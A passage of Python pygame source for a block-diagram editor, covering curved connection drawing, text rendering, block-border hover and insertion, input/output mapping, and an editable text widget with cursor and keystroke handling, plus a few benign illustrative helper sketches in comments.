- alpha) % (2*pi) - pi\n phi2 = (alpha - theta2) % (2*pi) - pi\n\n points = []\n # Firt curve - check for off-screen.\n if p1off and not (pos1b[0] > 0 < pos1b[1] and pos1b[0] < scsz[0] and \\\n pos1b[1] < scsz[1]):\n # Off-screen - add the mid-point.\n points.append((pos1b[0] + 0.5*lw*sin(theta1), \\\n pos1b[1] - 0.5*lw*cos(theta1)))\n points.insert(0, (pos1b[0] - 0.5*lw*sin(theta1), \\\n pos1b[1] + 0.5*lw*cos(theta1)))\n # Now check for straight.\n elif abs(phi1 % (2.*pi) - pi) < 0.1:\n # Straight - add the end-point.\n points.append((pos1[0] + 0.5*lw*sin(theta1), \\\n pos1[1] - 0.5*lw*cos(theta1)))\n points.insert(0, (pos1[0] - 0.5*lw*sin(theta1), \\\n pos1[1] + 0.5*lw*cos(theta1)))\n elif abs((phi1+pi) % (.2*pi) - pi) < 0.1:\n # Reverse - add the end-point upside down.\n points.append((pos1[0] - 0.5*lw*sin(theta1), \\\n pos1[1] + 0.5*lw*cos(theta1)))\n points.insert(0, (pos1[0] + 0.5*lw*sin(theta1), \\\n pos1[1] - 0.5*lw*cos(theta1)))\n else:\n # Calculate radius of curvature.\n r1 = pLen1 * tan(phi1 / 2.)\n\n # Calculate centre of curvature.\n c1 = [pos1[0] + r1 * cos(theta1 + pi/2.),\n pos1[1] + r1 * sin(theta1 + pi/2.)]\n\n # Draw the curve.\n self.drawArc(points, c1, r1, theta1-pi/2., pi-phi1%(2*pi), lw)\n\n # Second curve - check for off-screen.\n if p2off and not (pos2b[0] > 0 < pos2b[1] and pos2b[0] < scsz[0] and \\\n pos2b[1] < scsz[1]):\n # Off-screen - add the mid-point.\n points.append((pos2b[0] + 0.5*lw*sin(theta2), \\\n pos2b[1] - 0.5*lw*cos(theta2)))\n points.insert(0, (pos2b[0] - 0.5*lw*sin(theta2), \\\n pos2b[1] + 0.5*lw*cos(theta2)))\n # Now check for straight.\n elif abs(phi2%(2.*pi) - pi) < 0.1:\n # Straight - add the end-point.\n points.append((pos2[0] + 0.5*lw*sin(theta2), \\\n pos2[1] - 0.5*lw*cos(theta2)))\n points.insert(0, (pos2[0] - 0.5*lw*sin(theta2), \\\n pos2[1] + 0.5*lw*cos(theta2)))\n elif abs((phi2+pi) % (2.*pi) - pi) < 0.1:\n # Reverse - add the end-point upside down.\n points.append((pos2[0] - 0.5*lw*sin(theta2), \\\n pos2[1] + 0.5*lw*cos(theta2)))\n points.insert(0, (pos2[0] + 0.5*lw*sin(theta2), \\\n pos2[1] - 0.5*lw*cos(theta2)))\n else:\n # Calculate radius of curvature.\n r2 = -pLen2 * tan(phi2 / 2.)\n\n # Calculate centre of curvature.\n c2 = [pos2[0] + r2 * cos(theta2 - pi/2.),\n pos2[1] + r2 * sin(theta2 - pi/2.)]\n\n # Draw the curve.\n self.drawArc(points, c2, r2, theta2+phi2-pi/2., pi-phi2%(2*pi), lw)\n\n # Do the actual drawing.\n pygame.draw.polygon(screen, self.colour, points)\n\nclass EscapeRoute(Connection):\n def __init__(self, block, pos1, pos2, theta1, theta2 = -0.25*pi):\n '''Joins the two points as an escape route ONLY if both points are on\n the screen.'''\n super(EscapeRoute, self).__init__(block, pos1, pos2, theta1, \\\n theta2=theta2, colour=esrColour)\n\n def draw(self, screen):\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n sp1 = pl.parentPoint(self.pos1, scArea)\n sp2 = pl.parentPoint(self.pos2, scArea)\n if not (sp1[0] > 0 < sp2[0] and sp1[0] < scsz[0] > sp2[0] \\\n and sp1[1] > 0 < sp2[1] and sp1[1] < scsz[1] > sp2[1]):\n return\n\n super(EscapeRoute, self).draw(screen)\n\nclass Text(Feature):\n __slots__ = ['block', 'text', 'pt', 'font', 'radius', 'bkgColour']\n def __init__(self, block, text, radius, pt=(0,0), bkgColour=None, \\\n font=None):\n '''Draws the specified text at the specified position.'''\n self.block = block\n self.text = text\n self.radius = radius\n self.pt = pt\n self.bkgColour = bkgColour\n\n if font == None:\n try:\n self.font = Text.defaultFont\n 
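# --- Illustrative aside (not part of the original source) ---
# A minimal, standalone sketch of the arc-tessellation idea used by
# Connection.drawArc: a circular arc is approximated by straight segments,
# with the segment count derived from the on-screen arc length. RESOLUTION
# and MAX_SEGMENTS are assumed stand-ins for the module-level `resolution`
# and `maxSegments` constants, whose values are not shown in this excerpt.
from math import cos, sin

RESOLUTION = 5.0      # assumed: target length of one segment, in pixels
MAX_SEGMENTS = 50     # assumed: hard cap on segments per arc

def arc_points(centre, radius, theta0, gamma):
    """Approximate the arc starting at angle theta0 and spanning gamma."""
    arc_len = abs(radius * gamma)
    n = min(int(arc_len / RESOLUTION) + 1, MAX_SEGMENTS)
    d_gamma = gamma / n
    return [(centre[0] + radius * cos(theta0 + i * d_gamma),
             centre[1] + radius * sin(theta0 + i * d_gamma))
            for i in range(n + 1)]

# e.g. a quarter circle of radius 100 centred on the origin:
# arc_points((0.0, 0.0), 100.0, 0.0, 3.141592653589793 / 2)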
except:\n self.font = Text.defaultFont = pygame.font.Font(None, 24)\n else:\n self.font = font\n\n def draw(self, screen):\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n # 1. Render the text.\n if self.bkgColour:\n surface = self.font.render(self.text, True, (0,0,0), \\\n self.bkgColour).convert()\n else:\n surface = self.font.render(self.text, False, (0,0,0)).convert()\n sz = surface.get_size()\n\n # Don't draw it if it's too small.\n if 2. * sz[0] * sz[1] / scArea > self.block.g_absPlacement.scale:\n return\n\n # Find the position.\n pt = self.block.g_absPlacement.parentPoint(self.pt, scArea)\n r = self.block.g_absPlacement.parentLength(self.radius, scArea)\n\n # 3. Check if it needs to be scaled.\n self.sFactor = sFactor = 2. * r / sz[0]\n\n # Cutoff - don't draw.\n if sFactor > 0.3:\n # Scale it if needed.\n if sFactor < 1.:\n sz = [int(round(i * sFactor)) for i in sz]\n surface = pygame.transform.scale(surface, sz)\n\n # 4. Put the text.\n screen.blit(surface, [pt[i] - 0.5* sz[i] for i in (0,1)])\n\nclass EscapeText(Text):\n interactive = True\n def __init__(self, block, escapeBlock, radius, pt, font=None):\n super(EscapeText, self).__init__(block, '', radius, pt, tEsColour, font)\n self.escapeBlock = escapeBlock\n\n def draw(self, screen):\n # Update the text from the escape route.\n self.text = self.escapeBlock.comment\n super(EscapeText, self).draw(screen)\n\n def checkMouseHover(self, pt):\n return False\n\nclass Arrows(Feature):\n __slots__ = ['block', 'pts']\n def __init__(self, block, pts):\n '''Draws right-facing arrow heads at the specified points.'''\n self.block = block\n self.pts = pts\n\n def draw(self, screen):\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n a = 0.07\n for x,y in self.pts:\n x1,y1 = pl.parentPoint((x-a, y-a), scArea)\n x2,y2 = pl.parentPoint((x,y), scArea)\n x3,y3 = pl.parentPoint((x-a,y+a), scArea)\n pygame.draw.polygon(screen, (0,0,0), [(x1,y1),(x2,y2), (x3,y3)])\n\nclass BlockBorder(Rectangle):\n '''Defines the border of a block.'''\n\n def __init__(self, block, halfWidth, halfHeight, pt = (0., 0.)):\n super(BlockBorder, self).__init__(block, halfWidth, halfHeight, pt=pt)\n self.hoverEdge = None\n self.hoverRange = (halfWidth * halfHeight / 161.8) ** 0.5\n self.highlightWidth = self.hoverRange / 6.\n\n def draw(self, screen):\n # Draw the bounding rectangle.\n super(BlockBorder, self).draw(screen)\n\n # Also draw any escapes passing through this block.\n escChilds = [ch for ch in self.block.g_children if \\\n len([e for e in ch.passingEscapes if \\\n e in self.block.passingEscapes])]\n\n if len(escChilds):\n if self.block.g_absPlacement.scale >= self.block.g_sizeCutoff:\n x0,y0 = self.pt\n pos2 = (x0+self.halfWidth, y0-self.halfHeight)\n\n # Create one escape route and reuse it.\n route = EscapeRoute(self.block, pos2, pos2, 0.)\n\n for ch in escChilds:\n x0, y0 = ch.g_border.pt\n pos1 = (x0+ch.g_border.halfWidth, y0-ch.g_border.halfHeight)\n pl = ch.g_relPlacement\n pos1 = pl.parentPoint(pos1, self.block.g_absPlacement.area)\n ang = pl.parentAngle(-0.25 * pi)\n\n route.pos1 = pos1\n route.theta1 = ang\n route.draw(screen)\n\n self.drawn = True\n\n def drawSelected(self, screen):\n self.type = RectType.Selected\n self.draw(screen)\n self.type = RectType.Boundary\n\n def pointWithin(self, point):\n '''(point) - Checks if the specified point lies within the border.'''\n return abs(point[0]) <= self.halfWidth and \\\n abs(point[1]) <= self.halfHeight\n\n def checkMouseHover(self, 
point):\n '''(point, screen)'''\n\n if isinstance(self.block, sourceFile.MasterBlock):\n return False\n\n if not self.pointWithin(point):\n return False\n\n # Check the different borders.\n if point[1] + self.halfHeight < self.hoverRange:\n self.hoverEdge = 0\n return True\n if point[1] - self.halfHeight > -self.hoverRange:\n self.hoverEdge = 1\n return True\n if point[0] + self.halfWidth < self.hoverRange:\n self.hoverEdge = 2\n return True\n if point[0] - self.halfWidth > -self.hoverRange:\n self.hoverEdge = 3\n return True\n return False\n\n def mouseHover(self, screen):\n hd = self.highlightWidth\n if self.hoverEdge == 0:\n Rectangle(self.block, self.halfWidth, hd, \\\n RectType.Insert, (0., -self.halfHeight+hd)).draw(screen)\n elif self.hoverEdge == 1:\n Rectangle(self.block, self.halfWidth, hd, \\\n RectType.Insert, (0., self.halfHeight-hd)).draw(screen)\n elif self.hoverEdge == 2:\n Rectangle(self.block, hd, self.halfHeight, \\\n RectType.Insert, (-self.halfWidth+hd, 0.)).draw(screen)\n elif self.hoverEdge == 3:\n Rectangle(self.block, hd, self.halfHeight, \\\n RectType.Insert, (self.halfWidth-hd, 0.)).draw(screen)\n\n def mouseClick(self, actor):\n # Set the mode.\n actor.setMode(SysMode.Standard)\n\n # Set the selection.\n actor.setSelection(self.block)\n\n # Insert a new block.\n if self.hoverEdge == 0:\n actor.insertPar(False)\n elif self.hoverEdge == 1:\n actor.insertPar(True)\n elif self.hoverEdge == 2:\n actor.insertSeq(False)\n elif self.hoverEdge == 3:\n actor.insertSeq(True)\n\nclass MapFeature(InteractiveFeature):\n pathColours = (( 0, 0, 128),\n ( 0, 128, 0),\n (128, 0, 0),\n ( 0, 128, 128),\n (128, 0, 128),\n (128, 128, 0),\n ( 0, 64, 128),\n ( 64, 128, 0),\n (128, 0, 64),\n ( 0, 128, 64),\n (128, 64, 0),\n ( 64, 0, 128))\n\n def __init__(self, block, ht, inputs, outputs, mapping):\n if len(inputs) != mapping.numInputs:\n raise ValueError('mapping and inputs have different sizes')\n elif len(outputs) != mapping.numOutputs:\n raise ValueError('mapping and outputs have different sizes')\n\n self.block = block\n self.inputs = inputs\n self.outputs = outputs\n self.mapping = mapping\n self.height = ht\n\n self.highlight = [True, 0]\n self.selected = None\n self.hideHighlight = False\n self.hoverIn = None\n self.radius = 0.15 *self.height/max(len(self.inputs),len(self.outputs))\n\n def draw(self, screen):\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n self.radius = self.height*(0.03 + 0.05 / max(len(self.inputs), \\\n len(self.outputs)))\n r = int(round(pl.parentLength(self.radius, scArea)))\n\n # Draw the connections.\n clrIndex = 0\n for i in range(len(self.mapping)):\n j = self.mapping[i]\n p1, a1 = self.inputs[i]\n p2, a2 = self.outputs[j]\n c = Connection(self.block, p1, p2, a1, a2, self.pathColours[clrIndex])\n c.draw(screen)\n\n clrIndex = (clrIndex + 1) % len(self.pathColours)\n\n # Draw the input circles.\n for pt, angle in self.inputs:\n pt = tuple(int(i) for i in pl.parentPoint(pt, scArea))\n pygame.draw.circle(screen, mPtColour, pt, r)\n\n # Draw the output circles.\n for pt, angle in self.outputs:\n pt = tuple(int(i) for i in pl.parentPoint(pt, scArea))\n pygame.draw.circle(screen, mPtColour, pt, r)\n\n def checkMouseHover(self, pos):\n r2 = self.radius ** 2\n\n # Check for hover over input circles.\n self.hoverIn = True\n for i in range(len(self.inputs)):\n pt, angle = self.inputs[i]\n if sum((pos[i] - pt[i]) ** 2 for i in (0,1)) <= r2 * 1.6:\n self.hoverIndex = i\n return True\n\n # Check for hover over 
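# --- Illustrative aside (not part of the original source) ---
# The four-band hit test used by BlockBorder.checkMouseHover, isolated as a
# pure function: given a point in block coordinates, report which border
# band it falls in, using the original's edge numbering (0-3). The
# "top"/"bottom" labels assume pygame's y-down convention.
def edge_under_point(point, half_width, half_height, hover_range):
    x, y = point
    if abs(x) > half_width or abs(y) > half_height:
        return None                      # outside the block entirely
    if y + half_height < hover_range:
        return 0                         # band along the top edge
    if y - half_height > -hover_range:
        return 1                         # band along the bottom edge
    if x + half_width < hover_range:
        return 2                         # band along the left edge
    if x - half_width > -hover_range:
        return 3                         # band along the right edge
    return None                          # interior: no edge hovered

# edge_under_point((0.0, -0.95), 1.0, 1.0, 0.1) -> 0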
output circles.\n self.hoverIn = False\n for i in range(len(self.outputs)):\n pt, angle = self.outputs[i]\n if sum((pos[i] - pt[i]) ** 2 for i in (0,1)) <= r2 * 1.6:\n self.hoverIndex = i\n return True\n\n self.hoverIn = None\n return False\n\n def mouseHover(self, screen):\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n r = int(round(pl.parentLength(self.radius, scArea)))\n\n if self.hoverIn:\n # Highlight an input circle.\n pt, angle = self.inputs[self.hoverIndex]\n else:\n # Highlight an output circle.\n pt, angle = self.outputs[self.hoverIndex]\n\n pt = tuple(int(i) for i in pl.parentPoint(pt, scArea))\n pygame.draw.circle(screen, mHlColour, pt, r)\n\n # Hide the keyboard highlight.\n self.hideHighlight = True\n\n def mouseClick(self, actor):\n # Make sure that this mapping's selected.\n actor.mapClick(self)\n\n # Process the click.\n oldHighlight = self.highlight\n self.highlight = [self.hoverIn, self.hoverIndex]\n if self.select():\n actor.masterBlock.g_treeModified = True\n self.highlight = oldHighlight\n\n def enter(self, leftSide):\n '''Called when the mapping is entered in mapping mode.'''\n self.highlight[0] = leftSide\n self.selected = None\n if not self.fixHighlight():\n self.highlight[0] = not leftSide\n self.fixHighlight()\n\n def fixHighlight(self):\n 'internal.'\n if self.highlight[0]:\n if len(self.inputs) == 0:\n return False\n self.highlight[1] = min(self.highlight[1], len(self.inputs)-1)\n else:\n self.highlight[1] = min(self.highlight[1], len(self.outputs)-1)\n\n return True\n\n def drawSelected(self, screen):\n '''Called when the mapping is selected to draw selection.'''\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n r = int(round(pl.parentLength(self.radius, scArea)))\n\n # Calculate highlight.\n leftSide1, index = self.highlight\n if leftSide1:\n # Highlight an input circle.\n pt1, angle = self.inputs[index]\n else:\n # Highlight an output circle.\n pt1, angle = self.outputs[index]\n pt1 = tuple(int(i) for i in pl.parentPoint(pt1, scArea))\n\n if self.selected:\n # Calculate selection\n leftSide2, index = self.selected\n if leftSide2:\n # Highlight an input circle.\n pt2, angle = self.inputs[index]\n else:\n # Highlight an output circle.\n pt2, angle = self.outputs[index]\n\n pt2 = tuple(int(i) for i in pl.parentPoint(pt2, scArea))\n\n # Check for mouse-hovering line.\n if self.hoverIn != None:\n if self.hoverIn:\n pt3, angle = self.inputs[self.hoverIndex]\n else:\n pt3, angle = self.outputs[self.hoverIndex]\n pt3 = tuple(int(i) for i in pl.parentPoint(pt3, scArea))\n leftSide1 = self.hoverIn\n else:\n pt3 = pt1\n if self.hideHighlight:\n leftSide1 = leftSide2\n\n # Check for necessity of joining line.\n if leftSide1 != leftSide2:\n # Join two points with a line.\n pygame.draw.line(screen, trcColour, pt3, pt2)\n\n # Actually draw selection.\n pygame.draw.circle(screen, mSlColour, pt2, r)\n\n # Actually draw highlight.\n if not self.hideHighlight:\n pygame.draw.circle(screen, mHlColour, pt1, r)\n\n def up(self):\n if self.highlight[1] > 0:\n self.highlight[1] = self.highlight[1] - 1\n self.hideHighlight = False\n\n def down(self):\n self.highlight[1] = self.highlight[1] + 1\n self.fixHighlight()\n self.hideHighlight = False\n\n def left(self):\n self.hideHighlight = False\n if self.highlight[0]:\n return False\n else:\n self.highlight[0] = True\n if not self.fixHighlight():\n return False\n return True\n\n def right(self):\n self.hideHighlight = False\n if 
self.highlight[0]:\n self.highlight[0] = False\n self.fixHighlight()\n return True\n return False\n\n def select(self):\n 'Returns True if the block has changed.'\n if self.selected and self.selected[0] != self.highlight[0]:\n # Connect the points.\n if self.selected[0]:\n i,j = self.selected[1], self.highlight[1]\n self.selected = None\n else:\n j,i = self.selected[1], self.highlight[1]\n\n self.mapping.connections[i] = j\n return True\n else:\n self.selected = list(self.highlight)\n return False\n\n def cancel(self):\n 'Returns True if the cancel has been processed.'\n if self.selected:\n self.selected = None\n return True\n return False\n\nclass InteractiveText(InteractiveFeature):\n def __init__(self, block, pretext, posttext, values, radius, callback, \\\n pt=(0.,0.), bkgColour=None, font=None):\n '''(block, pretext, posttext, values, radius, callback, point, font)\n - defines an interactive text element.\n\n block: the block to which this element belongs.\n pretext: a list of fixed text strings which will appear at the start\n of each line of text.\n posttext: a list of fixed text strings which will appear at the end\n of each line of text.\n values: a list of the editable pieces of text, which is wedged\n between the pretext and posttext of each line.\n radius: the radius of the circle within which the entire feature\n must remain.\n callback: a callback function which will be called with the values\n list as its argument when the text changes. Can also be\n a tuple containing a callback function and a list, in\n which case, fn(values, *list) is called.\n pt: the position of the text. Defaults to (0,0).\n bkgColour: if specified, fills in the area behind the text with the\n given colour.\n '''\n self.block = block\n self.pretext = pretext\n self.posttext = posttext\n self.values = list(values)\n self.callback = callback\n self.pt = pt\n self.radius = radius\n self.bkgColour = bkgColour\n self.textSz = None\n\n assert len(values) == len(pretext) == len(posttext)\n\n self.cursorPos = [0, 0]\n self.selStart = 0\n self.selLength = 0\n self.highlightMotion = False\n self.keyEvent = None\n\n if font == None:\n try:\n self.font = Text.defaultFont\n except AttributeError:\n self.font = Text.defaultFont = pygame.font.Font(None, 24)\n else:\n self.font = font\n\n try:\n InteractiveText.cursor\n except AttributeError:\n InteractiveText.cursor = ((len(ibeam_strings[0]),len(ibeam_strings)),\\\n (3, 7)) + \\\n pygame.cursors.compile(ibeam_strings)\n\n def tick(self):\n if self.keyEvent:\n # Repeated keypress processing.\n if time.time() >= self.repeatTime:\n self.processKeystroke(self.keyEvent)\n self.repeatTime = time.time() + repeatRate\n self.block.g_treeModified = True\n\n def draw(self, screen):\n scsz = screen.get_size()\n self.scArea = scArea = 0.25 * scsz[0] * scsz[1]\n\n # 1. Render the text.\n lineSize = self.font.get_linesize()\n height = width = 0\n surfaces = []\n for i in range(len(self.values)):\n s1 = self.font.render(self.pretext[i], False, fTxColour).convert()\n s2 = self.font.render(self.values[i], False, vTxColour).convert()\n s3 = self.font.render(self.posttext[i], False, fTxColour).convert()\n\n surfaces.append((s1,s2,s3))\n height = height + lineSize\n width = max(width, s1.get_width()+s2.get_width()+s3.get_width())\n lastHeight = max(s1.get_height(), s2.get_height(), s3.get_height())\n\n # Adjust for hanging characters in the last line.\n if lastHeight > lineSize:\n height = height + lastHeight - lineSize\n\n # 2. 
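# --- Illustrative aside (not part of the original source) ---
# The keyboard auto-repeat pattern used by tick/keyPress/keyUp above: the
# first repeat fires after an initial lag, later ones at a steady rate.
# REPEAT_LAG and REPEAT_RATE stand in for the module constants `repeatLag`
# and `repeatRate`, whose values are not shown in this excerpt.
import time

REPEAT_LAG = 0.5     # assumed: seconds before the first repeat
REPEAT_RATE = 0.05   # assumed: seconds between subsequent repeats

class KeyRepeater:
    def __init__(self, on_key):
        self.on_key = on_key
        self.event = None
        self.next_fire = 0.0

    def key_down(self, event):
        self.on_key(event)                       # fire once immediately
        self.event = event
        self.next_fire = time.time() + REPEAT_LAG

    def key_up(self, event):
        if self.event is not None and event == self.event:
            self.event = None

    def tick(self):                              # call once per frame
        if self.event is not None and time.time() >= self.next_fire:
            self.on_key(self.event)
            self.next_fire = time.time() + REPEAT_RATE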
Piece it all together.\n surface = pygame.Surface((width, height)).convert()\n if self.bkgColour:\n surface.fill(self.bkgColour)\n else:\n surface.fill(bkgColour)\n surface.set_colorkey(bkgColour)\n y = 0.\n for s1,s2,s3 in surfaces:\n x1,x2,x3 = (s.get_width() for s in (s1,s2,s3))\n x = 0.5 * (width - x1 - x2 - x3)\n surface.blit(s1, (x, y))\n x = x + x1\n surface.blit(s2, (x, y))\n x = x + x2\n surface.blit(s3, (x, y))\n y = y + lineSize\n\n # Find the position.\n pt = self.block.g_absPlacement.parentPoint(self.pt, scArea)\n r = self.block.g_absPlacement.parentLength(self.radius, scArea)\n\n # 3. Check if it needs to be scaled.\n self.sFactor = sFactor = 2. * r / (width ** 2 + height ** 2) ** 0.5\n\n # Cutoff - don't draw.\n if sFactor > 0.3:\n # Scale it if needed.\n if sFactor < 1.:\n width = int(round(width * sFactor))\n height = int(round(height * sFactor))\n surface = pygame.transform.scale(surface, (width, height))\n\n # 4. Put the text.\n putPos = (pt[0] - 0.5*width, pt[1] - 0.5*height)\n screen.blit(surface, putPos)\n self.textSz = (0.5*width, 0.5*height)\n\n # Draw a fine border.\n pygame.draw.rect(screen, bdrColour, \\\n pygame.Rect(putPos, (width, height)), 1)\n else:\n self.textSz = None\n\n def drawFinding(self, screen):\n '''Draws this block when the cursors resting on it but it hasn't yet\n been entered.'''\n if self.textSz == None:\n return\n\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n halfWidth, halfHeight = self.textSz\n x0,y0 = pl.parentPoint(self.pt, scArea)\n x1,y1 = (x0-halfWidth, y0-halfHeight)\n x2,y2 = (x0+halfWidth, y0-halfHeight)\n x3,y3 = (x0+halfWidth, y0+halfHeight)\n x4,y4 = (x0-halfWidth, y0+halfHeight)\n polygon = [(x1,y1),(x2,y2),(x3,y3),(x4,y4)]\n\n borderColour, fillColour, thickness = RectType.Selected\n\n if fillColour:\n pygame.draw.polygon(screen, fillColour, polygon)\n if borderColour:\n pygame.draw.polygon(screen, borderColour, polygon, thickness)\n\n def drawSelected(self, screen):\n if self.textSz == None:\n return\n\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n x0, y0 = pl.parentPoint(self.pt, scArea)\n\n # Choose the appropriate line.\n n, m = self.cursorPos\n lineSize = self.font.get_linesize()\n y = lineSize * n\n\n if self.selLength != 0:\n m = self.selStart\n\n # Get the sizes of the different sections.\n s1 = self.font.size(self.pretext[n])[0]\n s2a = self.font.size(self.values[n][:m])[0]\n s2b = self.font.size(self.values[n][m:])[0]\n s3 = self.font.size(self.posttext[n])[0]\n\n # Draw a cursor line.\n x = 0.5 * (s1 + s2a - s2b - s3)\n if self.sFactor < 1.:\n x = x * self.sFactor\n y = y * self.sFactor\n lineSize = lineSize * self.sFactor\n\n pt0 = (x0 + x, y0 - self.textSz[1] + y)\n\n if self.selLength == 0:\n pt1 = (x0 + x, y0 - self.textSz[1] + y + lineSize)\n pygame.draw.line(screen, csrColour, pt0, pt1)\n else:\n # Create a surface of the selected text.\n m2 = m + self.selLength\n s = self.font.render(self.values[n][m:m2], False, \\\n tuple(255-i for i in csrColour), csrColour)\n s.set_colorkey(None)\n\n if self.sFactor < 1.:\n width, height = s.get_size()\n width = int(round(width * self.sFactor))\n height = int(round(height * self.sFactor))\n s = pygame.transform.scale(s, (width, height))\n screen.blit(s, pt0)\n\n def checkMouseHover(self, pos):\n # Check for text not showing.\n if self.textSz == None:\n return False\n\n # Now check for hover over text.\n mPt = self.block.g_absPlacement.parentPoint(pos, self.scArea)\n tPt = 
self.block.g_absPlacement.parentPoint(self.pt, self.scArea)\n\n if tPt[0] - self.textSz[0] < mPt[0] < tPt[0] + self.textSz[0]:\n if tPt[1] - self.textSz[1] < mPt[1] < tPt[1] + self.textSz[1]:\n self.hoverPos = mPt\n return True\n return False\n\n def mouseHover(self, screen):\n # Do nothing special on a hover.\n pass\n\n def mouseClick(self, actor):\n # Make sure that this text's selected.\n actor.txtClick(self)\n\n # Set the cursor position.\n self.highlightMotion = False\n self.moveCursor(self.getClickPoint(self.hoverPos))\n\n def mouseDrag(self, event):\n self.highlightMotion = True\n self.moveCursor(self.getClickPoint(event.pos))\n\n def getClickPoint(self, point):\n '''internal. Returns the coordinates of the specified screen position.\n '''\n\n pl = self.block.g_absPlacement\n x0, y0 = pl.parentPoint(self.pt, self.scArea)\n\n # First find the correct row for the cursor.\n x = point[0] - x0\n y = point[1] - y0 + self.textSz[1]\n\n lineSize = self.font.get_linesize()\n if self.sFactor < 1.:\n lineSize = lineSize * self.sFactor\n x = x / self.sFactor\n\n if self.highlightMotion:\n n = self.cursorPos[0]\n else:\n n = min(int(y // lineSize), len(self.values) - 1)\n\n # Now find the correct column.\n s1 = self.font.size(self.pretext[n])[0]\n s2 = self.font.size(self.values[n])[0]\n s3 = self.font.size(self.posttext[n])[0]\n\n # 1. Guess the position.\n if x <= 0.5 * (s1 - s2 - s3):\n m = 0\n elif x >= 0.5 * (s1 + s2 - s3):\n m = len(self.values[n])\n else:\n dist = (0.5*(s2 + s3 - s1) + x)\n m = int(round(len(self.values[n]) * dist / s2))\n\n # 2. Refine the guess.\n gDist = self.font.size(self.values[n][:m])[0]\n\n if gDist < dist:\n # We guessed too low.\n while gDist < dist:\n diff = dist - gDist\n m = m + 1\n gDist = self.font.size(self.values[n][:m])[0]\n\n # We found the turning point.\n if diff < gDist - dist:\n m = m - 1\n elif gDist > dist:\n # We guessed too high.\n while gDist > dist:\n diff = gDist - dist\n m = m - 1\n gDist = self.font.size(self.values[n][:m])[0]\n\n # Found the turning point.\n if diff < dist - gDist:\n m = m + 1\n\n # 3. Return the value.\n return [n, m]\n\n def moveCursor(self, pt):\n 'internal. Moves the cursor within a row.'\n newY, newX = pt\n if newY != self.cursorPos[0]:\n self.cursorPos = pt\n self.selLength = 0\n elif not self.highlightMotion:\n self.cursorPos[1] = newX\n self.selLength = 0\n else:\n if not self.selLength:\n selEnd = self.cursorPos[1]\n elif self.selStart == self.cursorPos[1]:\n selEnd = self.selStart + self.selLength\n else:\n selEnd = self.selStart\n\n if newX < selEnd:\n self.selLength = selEnd - newX\n self.selStart = newX\n else:\n self.selLength = newX - selEnd\n self.selStart = selEnd\n\n self.cursorPos[1] = newX\n\n self.block.master.g_treeModified = True\n\n def blankSelection(self):\n 'internal. Blanks the selection. Returns True if there was one.'\n if not self.selLength:\n return False\n n,m = self.cursorPos[0], self.selStart\n self.values[n] = self.values[n][:m] + self.values[n][m+self.selLength:]\n self.selLength = 0\n self.cursorPos[1] = self.selStart\n return True\n\n def keyUp(self, event, actor):\n 'internal. A key has been released.'\n if self.keyEvent and event.key == self.keyEvent.key:\n self.keyEvent = None\n\n def keyPress(self, event, actor):\n 'internal. A key has been pressed.'\n self.keyEvent = event\n self.actor = actor\n self.processKeystroke(event)\n self.repeatTime = time.time() + repeatLag\n\n def processKeystroke(self, event):\n 'internal. 
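# --- Illustrative aside (not part of the original source) ---
# The guess-and-refine scheme of InteractiveText.getClickPoint, isolated:
# map a horizontal pixel offset to a character index, given a
# measure(text) -> pixel-width function (font.size would supply this).
# The proportional first guess assumes roughly uniform glyph widths; the
# loops then walk one character at a time to the nearest boundary. Note
# the original assigns `dist` only on its interior branch; this sketch
# returns early for the clamped cases instead.
def index_for_offset(text, x, measure):
    total = measure(text)
    if x <= 0:
        return 0
    if x >= total:
        return len(text)
    m = int(round(len(text) * x / total))    # proportional first guess
    g = measure(text[:m])
    if g < x:                                # guessed too low: walk right
        while g < x:
            diff = x - g
            m += 1
            g = measure(text[:m])
        if diff < g - x:                     # previous column was closer
            m -= 1
    elif g > x:                              # guessed too high: walk left
        while g > x:
            diff = g - x
            m -= 1
            g = measure(text[:m])
        if diff < x - g:
            m += 1
    return m

# With a monospace measure, offsets map to the nearest boundary:
# index_for_offset("hello", 24, lambda s: 10 * len(s)) -> 2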
Process a keystroke.'\n\n char = keyboard.charPressed(event.key, event.mod)\n if isinstance(char, str):\n # Translates to a char.\n self.blankSelection()\n n,m = self.cursorPos\n self.values[n] = self.values[n][:m] + char + \\\n self.values[n][m:]\n self.cursorPos[1] = m + 1\n else:\n key, mod = char\n self.highlightMotion = mod & pgl.KMOD_SHIFT\n mod = mod & ~ pgl.KMOD_SHIFT\n n,m = self.cursorPos\n\n if mod == 0:\n if key == keyboard.Return:\n # Enter.\n self.actor.txtDone()\n elif key == keyboard.Left:\n # Left arrow.\n self.moveCursor([n, max(0, m - 1)])\n elif key == keyboard.Right:\n # Right arrow.\n self.moveCursor([n, min(m + 1, len(self.values[n]))])\n elif key == keyboard.Up:\n # Up arrow.\n self.cursorPos[0] = max(0, n - 1)\n self.cursorPos[1] = min(self.cursorPos[1],\n len(self.values[self.cursorPos[0]]))\n self.selLength = 0\n elif key == keyboard.Down:\n # Down arrow.\n self.cursorPos[0] = min(n + 1, len(self.values) - 1)\n self.cursorPos[1] = min(self.cursorPos[1],\n len(self.values[self.cursorPos[0]]))\n self.selLength = 0\n elif key == keyboard.Home:\n # Home key.\n self.moveCursor([n, 0])\n elif key == keyboard.End:\n # End key.\n self.moveCursor([n, len(self.values[n])])\n elif key == keyboard.Backspace:\n # Backspace.\n if not self.blankSelection():\n n,m = self.cursorPos\n if m > 0:\n self.values[n] = self.values[n][:m-1] + self.values[n][m:]\n self.cursorPos[1] = m - 1\n else:\n return\n elif key == keyboard.Delete:\n # Delete.\n if not self.blankSelection():\n n,m = self.cursorPos\n if m < len(self.values[n]):\n self.values[n] = self.values[n][:m] + \\\n self.values[n][m+1:]\n else:\n return\n else:\n return\n elif mod == pgl.KMOD_LCTRL:\n 